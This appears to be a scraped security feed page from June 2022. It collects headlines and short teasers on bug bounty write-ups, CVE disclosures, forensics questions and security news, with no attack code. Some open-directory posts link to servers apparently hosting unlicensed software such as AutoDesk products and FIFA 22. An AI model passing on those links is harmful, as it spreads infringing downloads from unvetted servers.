    Hello Folks, I am using a Paladin USB (Version 8.x.x) on a Dell Latitude to take an image of the hard drive. Paladin is not appearing to detect the hard drive of the device, only the USB drive and my external SSD I'm using as the image destination. Secure boot is off. I tried poking around in the BIOS and disabled the UEFI Boot Path Security, but that didn't work. Has anyone come across this issue before? The only other BIOS setting I can see is that RAID is also enabled. Any tips would be appreciated. If all else fails I will just remove the hard drive and image with a write blocker so all hope is not lost yet. submitted by /u/scottrich5 [link] [comments]
    BitLocker and Unallocated Space
    I'm trying to carve for files from a system that was BitLocker encrypted. However, the free space still appears to be encrypted. Is this what everyone else typically sees? I did some testing on a VM where I enabled BitLocker, took a image and decrypted it using the recovery key and the free space appears to be still encrypted as well. submitted by /u/Mufassa810 [link] [comments]
  • Open

    ByPass — LSA Protect (RunAsPPL)
    O RunAsPPL é popularmente conhecido e aplicado durante um processo de hardening até mesmo pela facilidade de aplicar a proteção, mas… Continue reading on 100security »
    Protocols and Servers 2 | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/protocolsandservers2 Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    The Phantom Credentials of SCCM: Why the NAA Won’t Die
    TL;DR — Stop Using Network Access Accounts! Continue reading on Posts By SpecterOps Team Members »
  • Open

    Massive Trove of Gun Owners’ Private Information Leaked by California Attorney General
    submitted by /u/Hotdogpizzathehut [link] [comments]
    Microsoft Sentinel Automation Tips & Tricks – Part 1: Automation rules
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application
    Hyperlink Injection it’s when attacker injecting a malicious link when sending an email invitation. Continue reading on InfoSec Write-ups »
    Livepeer (Non Smart Contract) Security Disclosure Program
    Program Overview Continue reading on Livepeer Blog »
    How I Earned $200 in 5 Minutes | Open Redirection
    Hello Researchers, Continue reading on Medium »
    OpenSSH CVE-2018–15473 User Enumeration Vulnerability
    Description: Continue reading on Medium »
    XSS cheatsheet payloads
    XSS PAYLOADS Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    Step 11: Attacking Web Applications with Ffuf
    As of starting this one, it’s Monday 27th June and my second to last day in work. Continue reading on Medium »
    Giveaway #2: The Ultimate Guide to Hunt Account Takeover(2022)
    INTRODUCTION Continue reading on Medium »
    Access control worth $2000 (everyone missed this IDOR+Access control between two admins.)
    Tribute to Binit Ghimire Continue reading on Pentester Nepal »
    BugBounty Writeup: XSS, JWT none attack, Improper Error Handling
    Hackers around the world hunt bugs and, in some cases, earn full-time incomes. Continue reading on Medium »
  • Open

    STUFF
    AMC CC 2021 v17 AMC CC 2022 v26 AMC CC 2022 v31 AutoD 3ds SketchU 2017 http://in2017.iptime.org/Util/Graphic/ submitted by /u/rwolfman3000 [link] [comments]
    I found a good OD... Here you will find AutoDesk, graphics, network And programming Courses. Oh, And Fifa 22!
    http://dl.jb-team.com/ submitted by /u/yahya007 [link] [comments]
  • Open

    Nmap timing, tips and tricks?
    I cant be the only one, and i have messed around with settings but im hoping someone can chime in with a better or best way to do this. So scanning a class C internal. and i get a ton of this, i want to not wait 15 hours for a class C to port map but i dont want to sacrifice accuracy either. This just using nmap -vv -sC -sV 192.x.x.x/24 -Pn RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 adjust_timeouts2: packet supposedly had rtt of 9384712 microseconds. Ignoring time. Thanks in advance submitted by /u/networkalchemy [link] [comments]
    AlienVault OSSIM and ansible automation
    I have an AlienVault OSSIM environment where I routinely create/rebuild monitored VMs using Ansible. The usual steps to add a system to AlienVault are: Install agent on target Log into AV server via SSH Enter "Jailbreak" Register target IP using manage-agent Extract generated key and copy to target Configure key on target agent I want to automate these steps using Ansible as it's a pain to do all the above manually. Is anyone aware of any existing work in this area? submitted by /u/geggleau [link] [comments]
    I need advice from people who have gone through a similar situation
    hey everyone, I'm a beginner in pentesting and I decided to learn it after 3 years of university as a specialist in network security. But honestly, after 3 years I didn't learn anything about pentesting (only math, cisco and humanitarian subjects). Now it seems to me like I lost my time and whenever I can't solve tasks in pentesting I feel myself very very bad because I have to know all of this. I blame myself for how stupid I am because everyone in my surroundings is good at pentesting and they're winning in CTF. I really love pentesting but I don't feel confident, it seems to me that neither society nor my future employer needs me, because in a year I'm already graduating from the university and I don't know anything. Thank you for listening if you have overcome a similar situation please share ^^ ​ UPD: thanks to those who replied, it means a lot to a teenager who often forgets to just keep going. thank you for your support *hugs to everyone* submitted by /u/_hanabi_n [link] [comments]
  • Open

    HACK THE BOX: Easy Phish
    Challenge lab: Osint Continue reading on Medium »
    War in Ukraine / June 27
    One of the bloodiest wars of the XXI century Continue reading on Medium »
    Week 7: Exciting
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-06-28 Review
    检测引擎对熵值的敏感如何影响壳的设计 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-28 Review
    检测引擎对熵值的敏感如何影响壳的设计 by Avenger 更多最新文章,请访问SecWiki
  • Open

    直播倒计时十天 !CIS大会夏日版全议程公布
    “安全生长,重启一夏”,「CIS大会 夏日版·Summer live」即将精彩来袭!
    FreeBuf早报 | Killnet攻击立陶宛政府网站;网络攻击使伊朗钢铁公司被迫停产
    Killnet攻击立陶宛政府网站。
    伊朗最大的钢铁生产商遭遇网络攻击
    Ebrahimi称公司网站将很快恢复并重新上线。至于公司停止运营的原因,是网络攻击发生时,工厂刚好停电而无法继续生产。
    《互联网用户账号信息管理规定》发布,8月1日施行
    6月27日,国家网信办发布《互联网用户账号信息管理规定》,自2022年8月1日起施行。
    冒充BBVA银行2FA应用程序,Android恶意软件“Revive”的深度伪装
    一款名为“Revive”的新型安卓银行恶意软件被发现。
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »

  • Open

    Microsoft Hall Of Fame for a Small Misconfiguration.
    Hey everyone! I’m Aman, in this write-up I am going to show how you can find rate limit bug and my journey to the Microsoft Hall of Fame Continue reading on Medium »
    The Modern-Day Android Application Pentesting Approach for BugBounties/Assessments
    Understand the Attacker’s Approach and Mindset behind Pentesting Modern-Day Android Applications :D Continue reading on Medium »
    ITS TIME TO TAKEOVER ACCOUNT
    HOW I WAS ABEL TO TAKEOVER ANY USER ACCOUNT USING INVITE FUNCTION Continue reading on Medium »
    MUST HAVE : Skill for Cyber Security Engineer
    Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to… Continue reading on Medium »
    MUST KNOW : Popular operating systems in Cyber Security
    Every aspect in our life has been fullfilled by digital devices, as we can buy everything, reserve the table for two, or pay the bills in… Continue reading on Medium »
    My Pentest Log -22 — (Account Takeover Via Sinf file)
    Greetings to all from Porta Petrion, Continue reading on Medium »
    PocketPay Mobile Application Bug Bounty Campaign
    PocketPay apps are being launched on Android and iOS app stores. It’s time for the community to evolve and make things right; yes, it’s a… Continue reading on PocketPay »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
    Cyber Security adalah suatu aktivitas yang dilakukan dengan tujuan untuk mengamankan serta mencegah…
    Dengan banyaknya kejadian cyber crime di seluruh dunia, ada baiknya kita harus menghasilkan dan mengumpulkan orang orang yang mahir dalam… Continue reading on Medium »
    INERY BLOCKCHAIN INCENTIVIZED TESTNET WHITELIST
    Inery is the first-ever decentralized database management and blockchain solution $INR Continue reading on Medium »
    Intigriti’s June XSS challenge — Reflected XSS Write-up
    Preface Continue reading on Medium »
  • Open

    Velociraptor
    Hello. I am trying to test out Velociraptor but I'm having issues creating a "client.config.yaml" file to be used for my Windows agent installation. Has anyone been able to successfully deploy the agent in their environment on Windows, Linux and Mac OS? Also what are you using for the "Server" a physically box or a VM? submitted by /u/antmar9041 [link] [comments]
    Open source tools and DFIR Tryhackme equivalents
    I love learning about Pentesting and DFIR, but something I've noticed is that hacking has way more open source options and better learning material. Pentesting has so many amazing cheap hands-on learning resources, DFIR on the other hand has none that I know of. DFIR seems like the only way forward is to learn SANS ($$$). Don't get me wrong, I know things like the Sleuth Toolkit exists. I just don't know where to get hands-on experience with it in a learning environment. submitted by /u/MLGShyGuy [link] [comments]
    Browser Add-on to screenshot a whole page.
    I watched this video: https://youtu.be/gue5MofILxY?t=2354 and Cody Kinsey mentions a browser add-on that can continually scroll to the bottom of someone's social media feed or website and screenshot all the way down. Later this tool stitches these together as a pdf to keep a record of their page. Is anyone familiar with a tool or browser add-on capable of this? The tools I've found are either not free or don't work. submitted by /u/MLGShyGuy [link] [comments]
  • Open

    CVE-2022-32208: FTP-KRB bad message verification
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614332 - Bounty: $480
    CVE-2022-32206: HTTP compression denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614330 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614328 - Bounty: $480
    CVE-2022-32207: Unpreserved file permissions
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614331 - Bounty: $2400
    Unauthorized Access to Internal Server Panel without Authentication
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/1548067
    Reflected XSS via `` parameter
    U.S. Dept Of Defense disclosed a bug submitted by mdakh404: https://hackerone.com/reports/1536215
    HTTP request smuggling with Origin Rules using newlines in the host_header action parameter
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1575912 - Bounty: $3100
    Bypassing Cache Deception Armor using .avif extension file
    Cloudflare Public Bug Bounty disclosed a bug submitted by bombon: https://hackerone.com/reports/1391635 - Bounty: $500
    Sign in with Apple generates long-life JWTs, seemingly irrevocable, that grant immediate access to accounts
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593413 - Bounty: $250
    Sign in with Apple works on existing accounts, bypasses 2FA
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593404 - Bounty: $1000
    API docs expose an active token for the sample domain theburritobot.com
    Cloudflare Public Bug Bounty disclosed a bug submitted by sainaen: https://hackerone.com/reports/1507412 - Bounty: $500
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Internet Bug Bounty disclosed a bug submitted by windshock: https://hackerone.com/reports/1599573 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1569946
    CVE-2022-32206: HTTP compression denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1570651
    CVE-2022-32207: Unpreserved file permissions
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1573634
    CVE-2022-32208: FTP-KRB bad message verification
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590071
    Credential leak when use two url
    curl disclosed a bug submitted by chen172: https://hackerone.com/reports/1569926
  • Open

    How does a threat Intel company business model work?
    I was wondering how do companies that specialize in providing threat Intel generate revenue? Do they provide Intel feeds on a subscription based model to customer companies, or are they usually selling B2B to vendors such as fire wall companies? Thank you submitted by /u/DoubleAgent10 [link] [comments]
    Sending an email
    I have a question about SMTP servers. I learned that when sending mail, the sender's SMTP server forwards the mail to the recipient's SMTP server. When I heard that the SMTP server on the recipient's side forwards the mail to the POP/IMAP server for the recipient to receive, I thought why not just receive the mail directly from the SMTP server? submitted by /u/Awkward_String139 [link] [comments]
    Awesome Hacker Search Engines
    Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc.. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
    Is ELK as an integrated security solution any good?
    I am pretty impressed by the amount of integrations one can enable on an ELK stack. Basically, it can provide SIEM capabilities, EDR functions through osquery modules, dashboarding for every situation, network topology mapping and so much more. Moreover, it does cut the total spending quite a lot, especially when compared to other specialized solutions like Splunk and similar. I have 3 main questions: Is anyone successfully using it? Pros/cons to ad hoc solutions? How much maintenance/development does it require to keep running all the pieces together? Thank you in advance. submitted by /u/gatheringchaos [link] [comments]
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    War in Ukraine / June 24–26
    Russia is actively shelling Ukraine Continue reading on Medium »
    OSINT CTFs
    OSINT CTFs (Capture The Flag games) let you hone your skills through problem-solving games. I especially like those that educate you… Continue reading on Medium »
    Profil3r Tool — OSINT Tool
    Profil3r Tool Continue reading on Medium »
    How do I destroy malware and identify the author — Malware Analysis
    Hello Hackers, I’m MrEmpy and welcome. Today I will tell a story of how I found the author of malware. Continue reading on Medium »
  • Open

    SecWiki News 2022-06-27 Review
    商业银行攻防检测体系建设思考 by ourren SecWiki周刊(第434期) by ourren 信息系统供应链安全管理入门 by ourren 开源卫星地面站OpenATS by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-27 Review
    商业银行攻防检测体系建设思考 by ourren SecWiki周刊(第434期) by ourren 信息系统供应链安全管理入门 by ourren 开源卫星地面站OpenATS by ourren 更多最新文章,请访问SecWiki
  • Open

    Offensive Security: Getting Your Foothold In The Industry
    It’s been about a month since I published my last article discussing my OSCP journey and how I passed it. I am truly grateful for the… Continue reading on Medium »
    Kerberoasting Attacks and Detections
    Basic Overview Continue reading on Medium »
    A Plan for OSCP
    Hey, everyone welcome to my OSCP journey. Continue reading on Medium »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    Revive: from spyware to Android banking trojan | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    VaultBoot: remote attestation
    submitted by /u/hardenedvault [link] [comments]
    Notes on OpenSSL remote memory corruption
    submitted by /u/Gallus [link] [comments]
  • Open

    Awesome Hacker Search Engines
    Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc.. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
  • Open

    FreeBuf早报 | 腾讯 QQ 回应大批账号被盗;黑客仍在利用Log4Shell漏洞
    腾讯QQ官方回应称,主要原因系用户扫描过不法分子伪造的游戏登录二维码并授权登录,被黑产团伙劫持并记录,随后被不法分子利用发送不良图片广告。
    《个人信息跨境处理活动安全认证规范》发布,规范个人信息跨境活动
    《认证规范》从基本原则、个人信息处理者和境外接收方在跨境处理活动中应遵循的要求、个人信息主体权益保障等方面提出了要求。
    《中华人民共和国反电信网络诈骗法(草案二次审议稿)》发布
    《反电信网络诈骗法》共七章四十六条,将有利于进一步预防、遏制和惩治电信网络诈骗活动,加强反电信网络诈骗工作。
    俄罗斯对谷歌传播诋毁其军队的 “不可靠”信息进行罚款
    俄罗斯电信监管机构 Roskomnadzor 已对谷歌处以 6800 万卢布(约合120万美元)的罚款。
    QQ大规模盗号,给好友群发不雅照,腾讯回应来了
    QQ被盗后,会自动加入各种垃圾群,同时会自动向好友和群里发送垃圾、色情、赌博信息和链接。
    德克萨斯州天然气厂爆炸,俄威胁行为者或将是幕后黑手
    近期,德克萨斯州一家液化天然气厂爆炸,经调查,事件起因可能是由网络攻击引起的,而俄罗斯威胁行为者或将是事件幕后黑手。爆炸发生在德克萨斯州昆塔纳岛的自由港液化天然气(Freeport LNG)液化厂,此次事故将对自由港液化天然气的运营产生持久的影响。经初步调查表明,该事件是由于LNG输送管道的一段超压和破裂,导致液化天然气快速闪蒸和天然气蒸汽云释放和点燃。目前尚不清楚为什么该企业的安全机制不能阻止爆
  • Open

    Pretty good archive of TV, with differing quality types, it's seems to have some dubbed
    submitted by /u/hannibalateam [link] [comments]
    Huge directory of music videos
    submitted by /u/ilikemacsalot [link] [comments]

  • Open

    linx - Reveals invisible links within JavaScript files
    submitted by /u/rjz4 [link] [comments]
  • Open

    Detecting Linux Anti-Forensics Log Tampering
    submitted by /u/lugh [link] [comments]
    What is the modern, unofficial digital forensics process model that sees the most real-world application to investigations?
    To my understanding and research thus far which may be incorrect, I have gathered that there is still no official model to follow for digital forensic investigations. However, there are a number of proposed models such as: First proposed methodology from Politt outlines: Acquisition>Identification>Evaluation>Admission. DFRWS investigative model outlines: Identification>Preservation>Collection>Examination>Analysis>Presentation. Abstract digital forensics model (ADFM) outlines: Identification>Preparation>Approach Strategy>Preservation>Collection>Examination>Analysis>Presentation>Returning Evidence. Integrated digital investigation process (IDIP) outlines: Readiness Phase>Deployment Phase>Physical Crime Scene Investigation Phases/Digital Crime Scene Investigation Phases>Review Phase. Etc... That said, is there a proposed model that is used more commonly in modern investigations than others to the point in which it can almost be considered the unofficial standard? Or is it truly "pick what's most applicable to this specific investigation"? Thank you. submitted by /u/ringzero_ [link] [comments]
  • Open

    Intigriti’s May XSS challenge By PiyushThePal
    How far can you take prototype pollution? This challenge is a great showcase which uses an unpatched jQuery plugin to exploit and bypass… Continue reading on Medium »
  • Open

    Bypassing Cloudflare WAF with Host header manipulation
    Hey Folks! Thanks for your responses on my last blog. Let’s learn something new today as it is going to be damn interesting one. Continue reading on Medium »
    OS atau Operating System merupakan unsur yang sangat penting di dalam device yang kita genggam saat…
    Linux, sebagai seorang Cyber Security Engineer kita harus mengenal betul apa itu linux dan bagaimana cara menggunakannya. Pada dasarnya… Continue reading on Medium »
    MSA Weekly 1 — “5 Operating System Untuk Cyber Security”
    Ethical Hacking merupakan suatu kegiatan mengidentifikasi kelemahan dalam sistem komputer ataupun jaringan computer serta dapat… Continue reading on Medium »
    MSA Weekly 1 — “Skill yang harus dimiliki seorang cyber security engineer”
    Nah kita udah belajar mengenai sistem operasi yang biasa dipakai di cyber security, sekarang kita belajar beberapa skill yang harus… Continue reading on Medium »
    MSA Weekly 1 — “5 OS Cyber Security, kamu harus tau!”
    Dimasa digital saat ini, kita tentu tidak asing dengan istilah keamanan siber atau cyber security. dikutip dari Cisco, cyber security… Continue reading on Medium »
    How to find bugs : ULTIMATE TIPS
    There is consistently one more bug to fix. On the off chance that we don’t fix 100% of the bugs in our site, the site will be totally… Continue reading on Medium »
    How to find 1st bug for beginner bounty hunters (from personal experience)
    For people starting the bug bounty journey… Continue reading on Medium »
    MSA Weekly 1 - “Skill yang harus dimiliki Cyber Security Engineer”
    Dengan memasuki era informasi di mana komunikasi dan perdagangan melalu internet menjadi fokus utama bagi bisnis, konsumen, pemerintah dan… Continue reading on Medium »
    MAGNETY TESTNET QUICK GUIDE
    Magnety is The first DeFi Social Wallet Continue reading on Medium »
    My Reason for Writing on Medium as a Bug Bounty Hunter
    I’m a hacker who likes to write. Continue reading on Medium »
  • Open

    User can link non-public file attachments, leading to file disclose on edit by higher-privileged user
    Phabricator disclosed a bug submitted by foobar7: https://hackerone.com/reports/763177 - Bounty: $500
  • Open

    How did I design and build a complex AD set
    Hi Folks, today I would like to share how did I design and build a vulnerable AD set. Before moving to this topic, let me introduce the… Continue reading on Medium »
    Red Team vs Blue Team
    As I study for my Security+ exam, I covered the topic of the Read Team and Blue Team. In the world of cybersecurity, these groups work… Continue reading on Medium »
    Walkthrough of My Vulnerable AD Set
    Hi guys, in previous days I designed and built a difficult and complex vulnerable AD set, I planned to post the guide to reproduce it… Continue reading on Medium »
  • Open

    Decrypting TLS In Wireshark For Homegrown Application
    Hello Everyone! I posted about this in /r/networking yesterday (link below for background), made some progress there, but hoping I can get a little further here. We have an in-house application we've written for our client for network communication over the internet between us and them. Almost everything is working well except for some errors inside the TLS stream they've asked me to debug. My company created the certificates in Windows Server 2019 by installing the "Certificate Authority" role. I have the password used to create the cert. So in theory I should have access to everything I need to decrypt the TLS sections of the packet capture, but this is the first time I've done this and I'm not having any luck. I have the .pfx files and I used openssl.exe to export the private key and openssl didn't report any errors in that process. I tried that private key in Wireshark but it didn't decrypt the TLS stream. So I tried converting that to a plain-text unencrypted private key file with openssl.exe and load that into Wireshark, still didn't decrypt the TLS stream. I've tried every combination I think think of in Wireshark. In Protocols>TLS I've tried the options "RSA Keys List", "TLS Debug File", Pre-Shared Key", and "(Pre)-Master-Secret log filename". There is also a general "RSA Keys" section in the main Preferences window and I loaded the keys there as well, no luck. The "Application Data" packets still show up with the encrypted data. I also made sure the private key file name matched the "commonName" field of the certificate exchange packet in the capture. I'm unsure how to proceed from here. What am I missing? What else can I try? https://old.reddit.com/r/networking/comments/vkrz4g/decrypting_tls_in_wireshark_for_homegrown/? submitted by /u/LearningSysAdmin987 [link] [comments]
  • Open

    SecWiki News 2022-06-26 Review
    QingTing: 安全工具编排平台 by ourren 美国爱因斯坦计划跟踪与解读(2022v1版) by ourren 基于持续学习方法的命名实体识别 by ourren 太空网络安全风险及攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-26 Review
    QingTing: 安全工具编排平台 by ourren 美国爱因斯坦计划跟踪与解读(2022v1版) by ourren 基于持续学习方法的命名实体识别 by ourren 太空网络安全风险及攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    Video analysis of police brutality against abortion rights activists.
    In a ruling that was as groundbreaking as it was controversial, six of the nine high courts overturned federal abortion law on Friday… Continue reading on Medium »
    SPY NEWS: 2022 — Week 25
    Summary of the espionage-related news stories for the Week 25 (19–25 June) of 2022. Continue reading on Medium »
  • Open

    Great Open Source Vulnerability Scanner on GitHub
    Article URL: https://github.com/mageni/mageni Comments URL: https://news.ycombinator.com/item?id=31882071 Points: 1 # Comments: 0

  • Open

    Jump starting an investigation ( school assignment)
    So I was given a flash drive to analyze and the files are of a .001, .002, .003, etc... It's been a while since I've done such an assignment, due to many General Ed and such classes since my last Forensics class. Any help on how I can proceed from this? I tried Encase and it only gives me the .001 file to load, but i proceed to do that and nothing happens. Any help would be greatly appreciated. submitted by /u/DeviantWolfe [link] [comments]
    What do you think about this workstation I built.
    submitted by /u/L4Z3R_H4WK [link] [comments]
  • Open

    Basic WebAssembly buffer overflow exploitation
    submitted by /u/chaplja [link] [comments]
  • Open

    统一身份管理方案:从解析到落地实录
    统一身份管理方案对于业内日趋严格的标准化工作的推进,还是有点参考意义的。
  • Open

    Which resume is best? one i created with canva or the one i created with word?
    word : https://drive.google.com/file/d/12x7-ENfdy9NI1nWpELRQCWCprJb4_FQG/view?usp=sharing canva : https://drive.google.com/file/d/1H-E8cOfq3sKC6onlJY2ZxN5nkQ7-mRni/view?usp=sharing submitted by /u/Appropriate_Text1996 [link] [comments]
    Aiming for SOC analyst positions, overhauled my resume, how's it look?
    Taking Security+ in 3 weeks (been studying for the past few months). My goal is become a SOC analyst as I really like working with technical data. My background is in gov / DOD intel and I previously applied to a bunch of entry level cyber jobs but got like 1 response so I completely redid my resume and tried to make the skills as relatable to netsec as possible. After I have Sec+ I'm planning to get my hands on an open source SIEM and get familiar with it at home. Possibly also going to study for CySA+ too while I apply for jobs. How does my resume look (as someone trying to transition into network security)? Any other ways / things I can do to make myself standout (again specifically going for SOC analyst)? And what's missing (beyond the obvious like experience with specific tools, SIEMs, IDS, IPS, firewalls, etc.)? Greatly appreciate any input / suggestions as I've been attempting to get into network security for a while now! https://imgur.com/a/3tPLmF3 submitted by /u/Anontrovert [link] [comments]
    How to set up a laptop as a dedicated mal-lab that has access to my home network for malware to send and receive traffic but cannot propagate to the rest of my devices?
    Hey all, After several years of self-teaching myself malware analysis, I was recently hired as a junior malware analyst for an IR company and I love it. Naturally, I want to practice at home in my free time as much as possible to continue learning. All of my independent analysis at home for learning purposes has been conducted in VMware for the ability to set everything up with my tools, snapshot, and go to town. As we all know, the problem with analyzing most modern malware on a VM is: Contains many methodologies to detect a virtual environment that is frankly a pain to attempt to circumvent. Only continues its malicious execution or drop/download of files from C2C if it can establish a genuine, consistent network connection. This is where isolating a VM from a network and attempting to use tools like FakeNet is rather difficult as while it's spoofing responses, the malware is still not able to download additional malicious files. That said, is it possible to take a laptop that I have and turn it into a glorified malware lab that can: Somehow contain the ability to revert to a "snapshot" as you'd see with a VM. Connect to my home network so the malware can send and receive legitimate network traffic while remaining separate from the other devices on my network (maybe a VLAN somehow?). Thank you, guys! submitted by /u/decyphier_ [link] [comments]
  • Open

    Russian tanks and other military stuff
    Russian tanks, pictures and blueprints http://armchairgeneral.com/rkkaww2/galleries/ ​ A blog from around 2001-2003, not much content but some interesting thoughts on Afghanistan from then along with a handful of pictures from there. http://www.nuui.com/Sections/ ​ airwar dot ru/other/ (Reddit auto spam filters hate this one which is why there's no URL) /draw, /draw2, and /draw3 have .zips of airplane diagrams, /manuals has a handful of plane manuals Also see airwar dot ru/image/ submitted by /u/c-rn [link] [comments]
    A Few ODs I have found in a span of a Couple Days.
    Some random ODs, not worth a single post, so I saved them and posting as a list. http://francois-planchu.com/images/(Someone's personal site, Random Pictures [Contains NSFW]) https://www.fundacionrenta.com/assets/ (Stock images, Fonts, and other assets) https://www.propweb.in/assets/ (More random assets) https://www.etrio.in/blog/ (Some Indian EV Website data, images, catalog, Promos) submitted by /u/amritajaatak [link] [comments]
    Time Magazine 1923-2014
    https://magazineproject.org/TIMEvault/ submitted by /u/c-rn [link] [comments]
    Does anyone else get a 403 Forbidden error when attempting to span hosts?
    As the title says. When I go to an imgur link directly, I can download just fine, but if I have to use the span hosts option in wget, I receive a 403 Forbidden error. Is there an explanation? submitted by /u/FuckedUpRetort [link] [comments]
    Commodore Amiga screenshots and box art
    http://www.amigalive.com/game-images/ submitted by /u/c-rn [link] [comments]
    Open directory of a cosplayer
    http://www.hosting.tk-lee.com/ Didn't look through everything so tagging nsfw submitted by /u/c-rn [link] [comments]
  • Open

    SecWiki News 2022-06-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    List of ARM cores affected by PACMAN vulnerability
    Article URL: https://developer.arm.com/documentation/ka005109/1-0?lang=en Comments URL: https://news.ycombinator.com/item?id=31876148 Points: 2 # Comments: 0
  • Open

    HDX (Headline Crypto) INCENTIVIZED TESTNET QUICK GUIDE, WITH 250,000 $HDX AS REWARDS
    HEADLINE Crypto is a Texas-based blockchain project and token from the team behind AlgoPay, AlgoCloud, Vaults Protocol, FORUM, PIPELINE-UI… Continue reading on Medium »
    INFORMATIX TESTNET COMPETITION QICK GUIDE, 750,000 $INFO tokens up for grabs
    Infomatix is a data collection tool that aims to build the worlds most comprehensive financial database through crowd sourced expertise. Continue reading on Medium »
    MSA Weekly 1 — “5 OS untuk Cyber Security”
    Jika kita membicarakan yang namanya Operating System (OS), sangatlah banyak diluar sana developer yang membuat/mendevelop Operating System… Continue reading on Medium »
    How I stopped hunting on HackerOne after years because they stole my $50k. And so should you.
    You may have heard about Belarusian security researcher xnwup and the story of blocking his $25k on HackerOne. It was pretty resonant at… Continue reading on Medium »
  • Open

    Next 13 Chrome extensions for OSINT
    We continue to look for extensions for the Google CHROME browser for you, which will help in the difficult task of finding information in… Continue reading on Medium »
    Instagram Information Gathering Tools
    I write this blog for those aspirants that have too enthusiastic to make a career in the field of Ethical hacking. for making a profession… Continue reading on Medium »
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview

  • Open

    Harmless NumPy issue receives CVE medium
    Article URL: https://github.com/numpy/numpy/issues/18993 Comments URL: https://news.ycombinator.com/item?id=31870409 Points: 3 # Comments: 0
  • Open

    Basic XSS Bypasses
    Alert(1) Continue reading on Medium »
    Cyber Security adalah suatu aktivitas yang dilakukan dengan tujuan untuk mengamankan serta mencegah…
    Dengan banyaknya kejadian cyber crime di seluruh dunia, ada baiknya kita harus menghasilkan dan mengumpulkan orang orang yang mahir dalam… Continue reading on Medium »
    Writing your own Burpsuite Extensions: Complete Guide
